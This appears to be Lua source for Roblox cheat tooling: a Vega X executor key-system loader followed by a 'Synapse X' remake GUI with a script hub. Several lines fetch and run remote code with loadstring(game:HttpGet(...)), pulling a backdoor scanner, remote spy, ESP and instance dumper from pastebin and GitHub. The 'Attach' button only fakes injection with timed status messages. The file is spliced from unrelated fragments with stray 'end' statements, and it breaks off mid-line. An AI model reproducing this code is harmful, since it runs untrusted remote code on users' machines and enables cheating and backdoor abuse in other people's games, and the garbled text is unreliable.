loadstring(game:HttpGet('https://pandadevelopment.net/servicelib?service=vegax&core=roblox¶m=v2'))() function Generate_Key() return PandaAuth:GetKey("vegax"); end function ValidateKey(Key) return PandaAuth:ValidateKey("vegax", tostring(Key)) end function CheckIfAutoexecExists() if (arceus.isarceusfolder(zidongjiaobenyunxinglujingzifuchuan) == false) then arceus.makearceusfolder("自动脚本运行") end end function LoadAutoexec() if (arceus.isarceusfolder(zidongjiaobenyunxinglujingzifuchuan) == false) then for _, scriptfile in pairs(arceus.listarceusfiles(zidongjiaobenyunxinglujingzifuchuan)) do executecode(arceus.readarceusfile(scriptfile)) end end end -- Multi-Language Key System Variables local KSSubTitleNotif1 = "The Key System Link has been pasted into your Clipboard, insert it into your Browser (Desktop Recommended)." local KSSubTitleNotif2 = "This key is not valid, go to our Discord Server if this is not correct." local KSSubTitleNotif3 = "The Discord Link has been pasted into your Clipboard, insert it into the Discord app." local KSSubTitleNotif4 = "This key is valid, enjoy Vega X!" -- Loading --CheckIfAutoexecExists() if not isfile("vegax_key.txt") then writefile("vegax_key.txt", "") end script.Parent.VegaXMenuToggleFrame.Visible = true repeat until game:IsLoaded() for _,Key in pairs(script.Parent.IntroFrame.BackgroundFrame:GetChildren()) do game:GetService("TweenService"):Create(Key, TweenInfo.new(ATime), {BackgroundTransparency = 0}):Play() Key:TweenSize(UDim2.new(0.075,0,1,0), "Out", "Quad", ATime, true) wait(0.05) end wait(0.25) game:GetService("TweenService"):Create(script.Parent.IntroFrame.VegaXLogo, TweenInfo.new(1), {ImageTransparency = 0}):Play() script.Parent.IntroFrame.VegaXLogo:TweenPosition(UDim2.new(0.5,0,0.5,0), "Out", "Quad", 1, true) wait(1.5) game:GetService("TweenService"):Create(script.Parent.IntroFrame.VegaXLogo, TweenInfo.new(1), {ImageTransparency = 1}):Play() script.Parent.IntroFrame.VegaXLogo:TweenPosition(UDim2.new(0.5,0,0.3,0), "Out", "Quad", 1, true) for _,Key in pairs(script.Parent.IntroFrame.BackgroundFrame:GetChildren()) do game:GetService("TweenService"):Create(Key, TweenInfo.new(ATime), {BackgroundTransparency = 1}):Play() Key:TweenSize(UDim2.new(0.075,0,0,0), "Out", "Quad", ATime, true) wait(0.05) end wait(1) script.Parent.IntroFrame:Destroy() local success, result = pcall(function() return ValidateKey(readfile("vegax_key.txt")) end) if success and result then -- LoadAutoexec() script.Parent.KeySystem.Visible = false script.Parent.VegaXMenuToggleFrame.Visible = true _G.MenuOpen = true script.Parent.SidebarFrame:TweenPosition(UDim2.new(0, 0, 0.5, 0), "Out", "Quint", 1, true) getgenv().arceus = nil else script.Parent.KeySystem:TweenPosition(UDim2.new(0, 0, 0.5, -20), "Out", "Quad", 1, true) end -- Key System Stuff -- script.Parent.KeySystem.CloseB.MouseButton1Click:connect(function() script.Parent.KeySystem:TweenPosition(UDim2.new(0,0,2,-20), "Out", "Quint", 1, true) wait(1) script.Parent.KSMenuToggleFrame.Visible = true script.Parent.KSMenuToggleFrame:TweenSize(UDim2.new(0,32,0,32), "Out", "Quint", 1, true) end) script.Parent.KSMenuToggleFrame.VegaXKSToggle.MouseButton1Click:connect(function() script.Parent.KSMenuToggleFrame:TweenSize(UDim2.new(0,0,0,0), "Out", "Quint", 1, true) wait(1) script.Parent.KSMenuToggleFrame.Visible = false script.Parent.KeySystem:TweenPosition(UDim2.new(0,0,0.5,-20), "Out", "Quint", 1, true) end) script.Parent.KeySystem.GetKeyB.MouseButton1Click:connect(function() script.Parent.KeySystem.SubTitle.FontFace.Weight = Enum.FontWeight.Bold script.Parent.KeySystem.SubTitle.Text = KSSubTitleNotif1 setclipboard(Generate_Key()) end) script.Parent.KeySystem.ApproveKeyB.MouseButton1Click:connect(function() script.Parent.KeySystem.SubTitle.FontFace.Weight = Enum.FontWeight.Regular if ValidateKey(script.Parent.KeySystem.TextBox.Text) then writefile("vegax_key.txt", script.Parent.KeySystem.TextBox.Text) -- LoadAutoexec() script.Parent.KeySystem.SubTitle.Text = KSSubTitleNotif4 script.Parent.KeySystem:TweenPosition(UDim2.new(0, 0, 2, -20), "Out", "Quad", 1, true) wait(1) script.Parent.KeySystem.Visible = false; script.Parent.VegaXMenuToggleFrame.Visible = true; _G.MenuOpen = true; script.Parent.SidebarFrame:TweenPosition(UDim2.new(0,0,0.5,0), "Out", "Quint", 1, true) getgenv().arceus = nil else script.Parent.KeySystem.SubTitle.Text = KSSubTitleNotif2 end end) script.Parent.KeySystem.JoinDiscordB.MouseButton1Click:connect(function() script.Parent.KeySystem.SubTitle.FontFace.Weight = Enum.FontWeight.Regular script.Parent.KeySystem.SubTitle.Text = KSSubTitleNotif3 setclipboard("https://vegax.gg/discord.html") end) end coroutine.wrap(KJDH_fake_script)() end) Section:NewButton("Synapse Remake", "synape", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- Synapse X in game executor reworked by Cremi for scriptblox.com pcall(function() game.CoreGui["Synapse X"]:Destroy() end) local SynapseXreal = Instance.new("ScreenGui") local MainFrame = Instance.new("Frame") local bar = Instance.new("Frame") local Close = Instance.new("TextButton") local Mini = Instance.new("TextButton") local Min = Instance.new("TextButton") local ImageLabel = Instance.new("ImageLabel") local security = Instance.new("TextLabel") local EditorFrame = Instance.new("ScrollingFrame") local Source = Instance.new("TextBox") local Comments_ = Instance.new("TextLabel") local Globals_ = Instance.new("TextLabel") local Keywords_ = Instance.new("TextLabel") local RemoteHighlight_ = Instance.new("TextLabel") local Strings_ = Instance.new("TextLabel") local Tokens_ = Instance.new("TextLabel") local Numbers_ = Instance.new("TextLabel") local Lines = Instance.new("TextLabel") local title = Instance.new("TextLabel") local list = Instance.new("Frame") local execute = Instance.new("TextButton") local clear = Instance.new("TextButton") local options = Instance.new("TextButton") local scripthub = Instance.new("TextButton") local Attach = Instance.new("TextButton") local title_2 = Instance.new("ImageLabel") local scripthub_2 = Instance.new("Frame") local optionspage = Instance.new("Frame") local bar_2 = Instance.new("Frame") local select = Instance.new("Frame") local dex = Instance.new("TextButton") local esp = Instance.new("TextButton") local spy = Instance.new("TextButton") local dumper = Instance.new("TextButton") local backdoor = Instance.new("TextButton") local desc = Instance.new("Frame") local descri = Instance.new("TextLabel") local title_3 = Instance.new("TextLabel") local execute_2 = Instance.new("TextButton") local close = Instance.new("TextButton") local title_4 = Instance.new("ImageLabel") local title_5 = Instance.new("TextLabel") local title_6 = Instance.new("ImageLabel") local synminbutt = Instance.new("ImageButton") local synapsex3 = Instance.new("TextButton") local Tabs = Instance.new("Folder") local NewTab = Instance.new("TextButton") local scriptselected = "none" local injected = false --Properties: SynapseXreal.Name = "Synapse X" SynapseXreal.Parent = game.CoreGui SynapseXreal.ResetOnSpawn = false MainFrame.Name = "MainFrame" MainFrame.Parent = SynapseXreal MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.fromRGB(45, 45, 45) MainFrame.BorderSizePixel = 0 MainFrame.Position = UDim2.new(0.0543109924, 0, 0.103222892, 0) MainFrame.Size = UDim2.new(0, 689, 0, 320) MainFrame.Visible = true bar.Name = "bar" bar.Parent = MainFrame bar.BackgroundColor3 = Color3.fromRGB(94, 94, 94) bar.BackgroundTransparency = 0.800 bar.BorderSizePixel = 0 bar.Position = UDim2.new(-0, 0, -0.00296382909, 0) bar.Size = UDim2.new(0, 689, 0, 25) synminbutt.Name = "synminbutt" synminbutt.Parent = SynapseXreal synminbutt.BackgroundColor3 = Color3.fromRGB(255, 255, 255) synminbutt.BackgroundTransparency = 1.000 synminbutt.Position = UDim2.new(0, 0, 0, 0) synminbutt.Size = UDim2.new(0, 24, 0, 28) synminbutt.Visible = false synminbutt.ZIndex = 14 synminbutt.Image = "http://www.roblox.com/asset/?id=7641125882" synminbutt.ImageRectSize = Vector2.new(138, 167) synminbutt.MouseButton1Click:Connect(function() MainFrame.Visible = true synminbutt.Visible = false end) Close.Name = "Close" Close.Parent = bar Close.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Close.BackgroundTransparency = 1.000 Close.BorderColor3 = Color3.fromRGB(27, 42, 53) Close.BorderSizePixel = 0 Close.Position = UDim2.new(0.965521046, 0, 0.07, 0) Close.Size = UDim2.new(0, 21, 0, 25) Close.Font = Enum.Font.Arial Close.Text = "X" Close.TextColor3 = Color3.fromRGB(255, 255, 255) Close.TextSize = 14.000 Close.MouseButton1Click:Connect(function() SynapseXreal:Destroy() end) Mini.Name = "Mini" Mini.Parent = bar Mini.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Mini.BackgroundTransparency = 1.000 Mini.BorderColor3 = Color3.fromRGB(27, 42, 53) Mini.BorderSizePixel = 0 Mini.Position = UDim2.new(0.905521046, 0, 0.01, 0) Mini.Size = UDim2.new(0, 21, 0, 25) Mini.Font = Enum.Font.Arial Mini.Text = "_" Mini.TextColor3 = Color3.fromRGB(255, 255, 255) Mini.TextSize = 14.000 Mini.MouseButton1Click:Connect(function() game.StarterGui:SetCore("SendNotification", { Title = "Synapse X"; Text = "Synapse X minimized."; Duration = 2; }) synminbutt.Visible = true MainFrame.Visible = false end) Min.Name = "Min" Min.Parent = bar Min.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Min.BackgroundTransparency = 1.000 Min.BorderColor3 = Color3.fromRGB(27, 42, 53) Min.BorderSizePixel = 0 Min.Position = UDim2.new(0.935521046, 0, 0.07, 0) Min.Size = UDim2.new(0, 21, 0, 25) Min.Font = Enum.Font.Arial Min.Text = "M" Min.TextColor3 = Color3.fromRGB(255, 255, 255) Min.TextSize = 14.000 Min.MouseButton1Click:Connect(function() game.StarterGui:SetCore("SendNotification", { Title = "Synapse X"; Text = "Synapse X hide. Press F6 to back."; Duration = 2; }) MainFrame.Visible = false synminbutt.Visible = false end) ImageLabel.Parent = MainFrame ImageLabel.BackgroundColor3 = Color3.fromRGB(47, 47, 47) ImageLabel.BorderSizePixel = 0 ImageLabel.Position = UDim2.new(0.0252733715, 0, 0.015625, 39) ImageLabel.Size = UDim2.new(0, 541, 0, 232) Tabs.Name = "Tabs" Tabs.Parent = ImageLabel NewTab.Name = "NewTab" NewTab.Parent = Tabs NewTab.BackgroundColor3 = Color3.fromRGB(107, 107, 107) NewTab.BorderSizePixel = 0 NewTab.Position = UDim2.new(0, 0, -0.0659999996, 0) NewTab.Size = UDim2.new(0, 14, 0, 14) NewTab.Font = Enum.Font.SourceSans NewTab.Text = "+" NewTab.TextColor3 = Color3.fromRGB(255, 255, 255) NewTab.TextSize = 14.000 security.Name = "security" security.Parent = ImageLabel security.BackgroundColor3 = Color3.fromRGB(255, 255, 255) security.Size = UDim2.new(0, 552, 0, 258) security.Visible = false security.Font = Enum.Font.SourceSans security.TextColor3 = Color3.fromRGB(0, 0, 0) security.TextSize = 14.000 EditorFrame.Name = "EditorFrame" EditorFrame.Parent = ImageLabel EditorFrame.Active = true EditorFrame.BackgroundColor3 = Color3.fromRGB(37, 37, 37) EditorFrame.BackgroundTransparency = 1.000 EditorFrame.BorderColor3 = Color3.fromRGB(61, 61, 61) EditorFrame.Size = UDim2.new(1, 0, 1, 0) EditorFrame.ZIndex = 3 EditorFrame.BottomImage = "rbxassetid://148970562" EditorFrame.CanvasSize = UDim2.new(0, 0, 0, 0) EditorFrame.HorizontalScrollBarInset = Enum.ScrollBarInset.ScrollBar EditorFrame.MidImage = "rbxassetid://148970562" EditorFrame.ScrollBarThickness = 5 EditorFrame.TopImage = "rbxassetid://148970562" EditorFrame.BorderSizePixel = 0 Source.Name = "Source" Source.Parent = EditorFrame Source.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Source.BackgroundTransparency = 1.000 Source.Position = UDim2.new(0, 30, 0, 0) Source.BorderSizePixel = 0 Source.Size = UDim2.new(0.945652187, 0, 1, 0) Source.ZIndex = 3 Source.ClearTextOnFocus = false Source.Font = Enum.Font.Code Source.MultiLine = true Source.ShowNativeInput = false Source.PlaceholderColor3 = Color3.fromRGB(204, 204, 2-4) Source.Text = "" Source.TextColor3 = Color3.fromRGB(204, 204, 204) Source.TextSize = 15.000 Source.TextXAlignment = Enum.TextXAlignment.Left Source.TextYAlignment = Enum.TextYAlignment.Top Comments_.Name = "Comments_" Comments_.Parent = Source Comments_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Comments_.BackgroundTransparency = 1.000 Comments_.Size = UDim2.new(1, 0, 1, 0) Comments_.ZIndex = 5 Comments_.Font = Enum.Font.Code Comments_.Text = "" Comments_.TextColor3 = Color3.fromRGB(59, 200, 59) Comments_.TextSize = 15.000 Comments_.TextXAlignment = Enum.TextXAlignment.Left Comments_.TextYAlignment = Enum.TextYAlignment.Top Globals_.Name = "Globals_" Globals_.Parent = Source Globals_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Globals_.BackgroundTransparency = 1.000 Globals_.Size = UDim2.new(1, 0, 1, 0) Globals_.ZIndex = 5 Globals_.Font = Enum.Font.Code Globals_.Text = "" Globals_.TextColor3 = Color3.fromRGB(132, 214, 247) Globals_.TextSize = 15.000 Globals_.TextXAlignment = Enum.TextXAlignment.Left Globals_.TextYAlignment = Enum.TextYAlignment.Top Keywords_.Name = "Keywords_" Keywords_.Parent = Source Keywords_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Keywords_.BackgroundTransparency = 1.000 Keywords_.Size = UDim2.new(1, 0, 1, 0) Keywords_.ZIndex = 5 Keywords_.Font = Enum.Font.Code Keywords_.Text = "" Keywords_.TextColor3 = Color3.fromRGB(248, 109, 124) Keywords_.TextSize = 15.000 Keywords_.TextXAlignment = Enum.TextXAlignment.Left Keywords_.TextYAlignment = Enum.TextYAlignment.Top RemoteHighlight_.Name = "RemoteHighlight_" RemoteHighlight_.Parent = Source RemoteHighlight_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) RemoteHighlight_.BackgroundTransparency = 1.000 RemoteHighlight_.Size = UDim2.new(1, 0, 1, 0) RemoteHighlight_.ZIndex = 5 RemoteHighlight_.Font = Enum.Font.Code RemoteHighlight_.Text = "" RemoteHighlight_.TextColor3 = Color3.fromRGB(0, 144, 255) RemoteHighlight_.TextSize = 15.000 RemoteHighlight_.TextXAlignment = Enum.TextXAlignment.Left RemoteHighlight_.TextYAlignment = Enum.TextYAlignment.Top Strings_.Name = "Strings_" Strings_.Parent = Source Strings_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Strings_.BackgroundTransparency = 1.000 Strings_.Size = UDim2.new(1, 0, 1, 0) Strings_.ZIndex = 5 Strings_.Font = Enum.Font.Code Strings_.Text = "" Strings_.TextColor3 = Color3.fromRGB(173, 241, 149) Strings_.TextSize = 15.000 Strings_.TextXAlignment = Enum.TextXAlignment.Left Strings_.TextYAlignment = Enum.TextYAlignment.Top Tokens_.Name = "Tokens_" Tokens_.Parent = Source Tokens_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Tokens_.BackgroundTransparency = 1.000 Tokens_.Size = UDim2.new(1, 0, 1, 0) Tokens_.ZIndex = 5 Tokens_.Font = Enum.Font.Code Tokens_.Text = "" Tokens_.TextColor3 = Color3.fromRGB(255, 255, 255) Tokens_.TextSize = 15.000 Tokens_.TextXAlignment = Enum.TextXAlignment.Left Tokens_.TextYAlignment = Enum.TextYAlignment.Top Numbers_.Name = "Numbers_" Numbers_.Parent = Source Numbers_.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Numbers_.BackgroundTransparency = 1.000 Numbers_.Size = UDim2.new(1, 0, 1, 0) Numbers_.ZIndex = 4 Numbers_.Font = Enum.Font.Code Numbers_.Text = "" Numbers_.TextColor3 = Color3.fromRGB(255, 198, 0) Numbers_.TextSize = 15.000 Numbers_.TextXAlignment = Enum.TextXAlignment.Left Numbers_.TextYAlignment = Enum.TextYAlignment.Top Lines.Name = "Lines" Lines.Parent = EditorFrame Lines.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Lines.BackgroundTransparency = 1.000 Lines.Size = UDim2.new(0, 30, 1, 0) Lines.ZIndex = 4 Lines.Font = Enum.Font.Code Lines.Text = "1" Lines.TextColor3 = Color3.fromRGB(255, 255, 255) Lines.TextSize = 15.000 Lines.TextYAlignment = Enum.TextYAlignment.Top title.Name = "title" title.Parent = MainFrame title.BackgroundColor3 = Color3.fromRGB(255, 255, 255) title.BackgroundTransparency = 1.000 title.Position = UDim2.new(0.330062926, 0, 0.00625000056, 0) title.Size = UDim2.new(0, 200, 0, 22) title.Font = Enum.Font.SourceSans title.Text = "Synapse X - vRBX (Modded by CremiWorld)" title.TextColor3 = Color3.fromRGB(255, 255, 255) title.TextSize = 16.000 list.Name = "list" list.Parent = MainFrame list.BackgroundColor3 = Color3.fromRGB(53, 53, 53) list.BorderSizePixel = 0 list.Position = UDim2.new(0.820970535, 0, 0.100000001, 0) list.Size = UDim2.new(0, 114, 0, 246) execute.Name = "execute" execute.Parent = MainFrame execute.BackgroundColor3 = Color3.fromRGB(104, 104, 104) execute.BackgroundTransparency = 0.800 execute.BorderSizePixel = 0 execute.Position = UDim2.new(0.0095389355, 0, 0.887499988, 0) execute.Size = UDim2.new(0, 92, 0, 30) execute.Font = Enum.Font.Arial execute.Text = "Execute" execute.TextColor3 = Color3.fromRGB(255, 255, 255) execute.TextSize = 14.000 execute.MouseButton1Click:Connect(function() if injected == true then loadstring(Source.Text)() end if injected == false then title.Text = "Synapse X - (Not injected! Press attach)" end end) clear.Name = "clear" clear.Parent = MainFrame clear.BackgroundColor3 = Color3.fromRGB(104, 104, 104) clear.BackgroundTransparency = 0.800 clear.BorderSizePixel = 0 clear.Position = UDim2.new(0.154146105, 0, 0.887499988, 0) clear.Size = UDim2.new(0, 84, 0, 30) clear.Font = Enum.Font.Arial clear.Text = "Clear" clear.TextColor3 = Color3.fromRGB(255, 255, 255) clear.TextSize = 14.000 clear.MouseButton1Click:Connect(function() Source.Text = "" end) options.Name = "options" options.Parent = MainFrame options.BackgroundColor3 = Color3.fromRGB(104, 104, 104) options.BackgroundTransparency = 0.800 options.BorderSizePixel = 0 options.Position = UDim2.new(0.285157200, 0, 0.887499988, 0) options.Size = UDim2.new(0, 84, 0, 30) options.Font = Enum.Font.Arial options.Text = "Options" options.TextColor3 = Color3.fromRGB(255, 255, 255) options.TextSize = 14.000 options.MouseButton1Click:Connect(function() if optionspage.Visible == true then optionspage.Visible = false elseif optionspage.Visible == false then optionspage.Visible = true end end) scripthub.Name = "scripthub" scripthub.Parent = MainFrame scripthub.BackgroundColor3 = Color3.fromRGB(104, 104, 104) scripthub.BackgroundTransparency = 0.800 scripthub.BorderSizePixel = 0 scripthub.Position = UDim2.new(0.871768773, 0, 0.887499988, 0) scripthub.Size = UDim2.new(0, 79, 0, 30) scripthub.Font = Enum.Font.Arial scripthub.Text = "Script Hub" scripthub.TextColor3 = Color3.fromRGB(255, 255, 255) scripthub.TextSize = 14.000 scripthub.MouseButton1Click:Connect(function() if scripthub_2.Visible == true then scripthub_2.Visible = false elseif scripthub_2.Visible == false then scripthub_2.Visible = true end end) Attach.Name = "Attach" Attach.Parent = MainFrame Attach.BackgroundColor3 = Color3.fromRGB(104, 104, 104) Attach.BackgroundTransparency = 0.800 Attach.BorderSizePixel = 0 Attach.Position = UDim2.new(0.741144657, 0, 0.887499988, 0) Attach.Size = UDim2.new(0, 84, 0, 30) Attach.Font = Enum.Font.Arial Attach.Text = "Attach" Attach.TextColor3 = Color3.fromRGB(255, 255, 255) Attach.TextSize = 14.000 Attach.MouseButton1Click:Connect(function() if injected == true then title.Text = "Synapse X - (Already injected!)" wait(1) title.Text = "Synapse X - vRBX (Modded by CremiWorld)" end if injected == false then title.Text = "Synapse X - (Checking...)" wait(0.1) title.Text = "Synapse X - (Injecting...)" wait(1.5) title.Text = "Synapse X - (Checking Whitelist...)" wait(0.8) title.Text = "Synapse X - (Scanning...)" wait(0.3) title.Text = "Synapse X - (Ready!)" wait(0.5) title.Text = "Synapse X - vRBX (Modded by CremiWorld)" injected = true end end) title_2.Name = "title" title_2.Parent = MainFrame title_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255) title_2.BackgroundTransparency = 1.000 title_2.Position = UDim2.new(0.00870821718, 0, 0, 0) title_2.Size = UDim2.new(0, 18, 0, 24) title_2.ZIndex = 14 title_2.Image = "http://www.roblox.com/asset/?id=7641125882" title_2.ImageRectSize = Vector2.new(138, 167) scripthub_2.Name = "scripthub" scripthub_2.Parent = SynapseXreal scripthub_2.BackgroundColor3 = Color3.fromRGB(45, 45, 45) scripthub_2.BorderSizePixel = 0 scripthub_2.Position = UDim2.new(0.433135211, 0, 0.502979755, 0) scripthub_2.Size = UDim2.new(0, 290, 0, 305) scripthub_2.Visible = false scripthub_2.ZIndex = 100 optionspage.Name = "optionspage" optionspage.Parent = SynapseXreal optionspage.BackgroundColor3 = Color3.fromRGB(45, 45, 45) optionspage.BorderSizePixel = 0 optionspage.Position = UDim2.new(0.433135211, 0, 0.502979755, 0) optionspage.Size = UDim2.new(0, 290, 0, 305) optionspage.Visible = false optionspage.ZIndex = 100 bar_2.Name = "bar" bar_2.Parent = scripthub_2 bar_2.BackgroundColor3 = Color3.fromRGB(94, 94, 94) bar_2.BackgroundTransparency = 0.800 bar_2.BorderSizePixel = 0 bar_2.Position = UDim2.new(0, 0, -0.0029638072, 0) bar_2.Size = UDim2.new(0, 290, 0, 25) select.Name = "select" select.Parent = scripthub_2 select.BackgroundColor3 = Color3.fromRGB(21, 21, 21) select.BorderSizePixel = 0 select.Position = UDim2.new(0.0299979374, 0, 0.104918033, 0) select.Size = UDim2.new(0, 82, 0, 264) select.ZIndex = 110 dex.Name = "dex" dex.Parent = select dex.BackgroundColor3 = Color3.fromRGB(0, 32, 61) dex.BackgroundTransparency = 1.000 dex.BorderColor3 = Color3.fromRGB(0, 0, 49) dex.BorderSizePixel = 0 dex.Position = UDim2.new(0.0121960752, 0, -1.49011612e-08, 0) dex.Size = UDim2.new(0, 80, 0, 18) dex.Font = Enum.Font.SourceSans dex.Text = " Dark Dex" dex.TextColor3 = Color3.fromRGB(255, 255, 255) dex.TextSize = 14.000 dex.TextXAlignment = Enum.TextXAlignment.Left dex.ZIndex = 110 dex.MouseButton1Click:Connect(function() scriptselected = "dex" end) esp.Name = "esp" esp.Parent = select esp.BackgroundColor3 = Color3.fromRGB(0, 32, 61) esp.BackgroundTransparency = 1.000 esp.BorderColor3 = Color3.fromRGB(0, 0, 49) esp.BorderSizePixel = 0 esp.Position = UDim2.new(0.0121960752, 0, 0.0681818053, 0) esp.Size = UDim2.new(0, 80, 0, 18) esp.Font = Enum.Font.SourceSans esp.Text = " Unnamed ESP" esp.TextColor3 = Color3.fromRGB(255, 255, 255) esp.TextSize = 14.000 esp.TextXAlignment = Enum.TextXAlignment.Left esp.ZIndex = 110 esp.MouseButton1Click:Connect(function() scriptselected = "esp" end) spy.Name = "spy" spy.Parent = select spy.BackgroundColor3 = Color3.fromRGB(0, 32, 61) spy.BackgroundTransparency = 1.000 spy.BorderColor3 = Color3.fromRGB(0, 0, 49) spy.BorderSizePixel = 0 spy.Position = UDim2.new(0.0121960752, 0, 0.136363626, 0) spy.Size = UDim2.new(0, 80, 0, 18) spy.Font = Enum.Font.SourceSans spy.Text = " Remote Spy" spy.TextColor3 = Color3.fromRGB(255, 255, 255) spy.TextSize = 14.000 spy.TextXAlignment = Enum.TextXAlignment.Left spy.ZIndex = 110 spy.MouseButton1Click:Connect(function() scriptselected = "spy" end) dumper.Name = "dumper" dumper.Parent = select dumper.BackgroundColor3 = Color3.fromRGB(0, 32, 61) dumper.BackgroundTransparency = 1.000 dumper.BorderColor3 = Color3.fromRGB(0, 0, 49) dumper.BorderSizePixel = 0 dumper.Position = UDim2.new(0.0121960752, 0, 0.204545438, 0) dumper.Size = UDim2.new(0, 80, 0, 18) dumper.Font = Enum.Font.SourceSans dumper.Text = " SaveInstance" dumper.TextColor3 = Color3.fromRGB(255, 255, 255) dumper.TextSize = 14.000 dumper.TextXAlignment = Enum.TextXAlignment.Left dumper.ZIndex = 110 dumper.MouseButton1Click:Connect(function() scriptselected = "dumper" end) backdoor.Name = "backdoor" backdoor.Parent = select backdoor.BackgroundColor3 = Color3.fromRGB(0, 32, 61) backdoor.BackgroundTransparency = 1.000 backdoor.BorderColor3 = Color3.fromRGB(0, 0, 49) backdoor.BorderSizePixel = 0 backdoor.Position = UDim2.new(0.0121960752, 0, 0.274545438, 0) backdoor.Size = UDim2.new(0, 80, 0, 18) backdoor.Font = Enum.Font.SourceSans backdoor.Text = " backdoor.exe" backdoor.TextColor3 = Color3.fromRGB(255, 255, 255) backdoor.TextSize = 14.000 backdoor.TextXAlignment = Enum.TextXAlignment.Left backdoor.ZIndex = 110 backdoor.MouseButton1Click:Connect(function() scriptselected = "backdoor" end) desc.Name = "desc" desc.Parent = scripthub_2 desc.BackgroundColor3 = Color3.fromRGB(21, 21, 21) desc.BorderSizePixel = 0 desc.Position = UDim2.new(0.340342641, 0, 0.613114715, 0) desc.Size = UDim2.new(0, 184, 0, 69) desc.ZIndex = 110 descri.Name = "descri" descri.Parent = desc descri.BackgroundColor3 = Color3.fromRGB(255, 255, 255) descri.BackgroundTransparency = 1.000 descri.BorderSizePixel = 0 descri.Position = UDim2.new(0.0112334546, 0, 0, 0) descri.Size = UDim2.new(0, 181, 0, 69) descri.Font = Enum.Font.SourceSans descri.Text = "" descri.TextColor3 = Color3.fromRGB(255, 255, 255) descri.TextSize = 15.000 descri.TextWrapped = true descri.TextXAlignment = Enum.TextXAlignment.Left descri.TextYAlignment = Enum.TextYAlignment.Top descri.ZIndex = 125 title_3.Name = "title" title_3.Parent = scripthub_2 title_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255) title_3.BackgroundTransparency = 1.000 title_3.Position = UDim2.new(0.161097407, 0, -0.000307376496, 0) title_3.Size = UDim2.new(0, 200, 0, 22) title_3.Font = Enum.Font.SourceSans title_3.Text = "Synapse X - Script Hub" title_3.TextColor3 = Color3.fromRGB(255, 255, 255) title_3.TextSize = 16.000 title_3.ZIndex = 110 execute_2.Name = "execute" execute_2.Parent = scripthub_2 execute_2.BackgroundColor3 = Color3.fromRGB(104, 104, 104) execute_2.BackgroundTransparency = 0.800 execute_2.BorderSizePixel = 0 execute_2.Position = UDim2.new(0.34057343, 0, 0.871106505, 0) execute_2.Size = UDim2.new(0, 92, 0, 30) execute_2.Font = Enum.Font.Arial execute_2.Text = "Execute" execute_2.TextColor3 = Color3.fromRGB(255, 255, 255) execute_2.TextSize = 14.000 execute_2.ZIndex = 110 execute_2.MouseButton1Click:Connect(function() if injected == true then if scriptselected == "dex" then loadstring(game:HttpGet("https://pastebin.com/raw/J8AX35Fg"))() end if scriptselected == "spy" then loadstring(game:HttpGet('https://pastebin.com/raw/JZaJe9Sg'))() end if scriptselected == "dumper" then saveinstance() end if scriptselected == "esp" then loadstring(game:HttpGet("https://raw.githubusercontent.com/ic3w0lf22/Unnamed-ESP/master/UnnamedESP.lua"))() end if scriptselected == "backdoor" then loadstring(game:HttpGet("https://raw.githubusercontent.com/iK4oS/backdoor.exe/master/source.lua"))() end if scriptselected == "none" then end end if injected == false then execute_2.Text = "Not Attached!" wait(1) execute_2.Text = "Execute" end end) close.Name = "close" close.Parent = scripthub_2 close.BackgroundColor3 = Color3.fromRGB(104, 104, 104) close.BackgroundTransparency = 0.800 close.BorderSizePixel = 0 close.Position = UDim2.new(0.685180664, 0, 0.871106505, 0) close.Size = UDim2.new(0, 84, 0, 30) close.Font = Enum.Font.Arial close.Text = "Close" close.TextColor3 = Color3.fromRGB(255, 255, 255) close.TextSize = 14.000 close.ZIndex = 110 close.MouseButton1Click:Connect(function() scriptselected = "none" scripthub_2.Visible = false end) title_4.Name = "title" title_4.Parent = scripthub_2 title_4.BackgroundColor3 = Color3.fromRGB(255, 255, 255) title_4.BackgroundTransparency = 1.000 title_4.Position = UDim2.new(0.00870821718, 0, 0, 0) title_4.Size = UDim2.new(0, 18, 0, 24) title_4.ZIndex = 110 title_4.Image = "http://www.roblox.com/asset/?id=7641125882" title_4.ImageRectSize = Vector2.new(138, 167) title_5.Name = "title" title_5.Parent = optionspage title_5.BackgroundColor3 = Color3.fromRGB(255, 255, 255) title_5.BackgroundTransparency = 1.000 title_5.Position = UDim2.new(0.161097407, 0, -0.000307376496, 0) title_5.Size = UDim2.new(0, 200, 0, 22) title_5.Font = Enum.Font.SourceSans title_5.Text = "Synapse X - Options Menu" title_5.TextColor3 = Color3.fromRGB(255, 255, 255) title_5.TextSize = 16.000 title_5.ZIndex = 110 title_6.Name = "title" title_6.Parent = optionspage title_6.BackgroundColor3 = Color3.fromRGB(255, 255, 255) title_6.BackgroundTransparency = 1.000 title_6.Position = UDim2.new(0.00870821718, 0, 0, 0) title_6.Size = UDim2.new(0, 18, 0, 24) title_6.ZIndex = 110 title_6.Image = "http://www.roblox.com/asset/?id=7641125882" title_6.ImageRectSize = Vector2.new(138, 167) synapsex3.Name = "synapsex3" synapsex3.Parent = optionspage synapsex3.BackgroundColor3 = Color3.fromRGB(104, 104, 104) synapsex3.BackgroundTransparency = 0.800 synapsex3.BorderSizePixel = 0 synapsex3.Position = UDim2.new(0.30757343, 0, 0.391106505, 0) synapsex3.Size = UDim2.new(0, 123, 0, 30) synapsex3.Font = Enum.Font.Arial synapsex3.Text = "Synapse X v3" synapsex3.TextColor3 = Color3.fromRGB(255, 255, 255) synapsex3.TextSize = 14.000 synapsex3.ZIndex = 110 synapsex3.MouseButton1Click:Connect(function() game.StarterGui:SetCore("SendNotification", { Title = "Synapse X"; Text = "Synapse X v3 coming soon."; Duration = 1; }) synapsex3.Text = "Coming soon." wait(1) synapsex3.Text = "Synapse X v3" end) -- Scripts: game:GetService("UserInputService").InputBegan:Connect(function (input) if MainFrame.Visible == false and 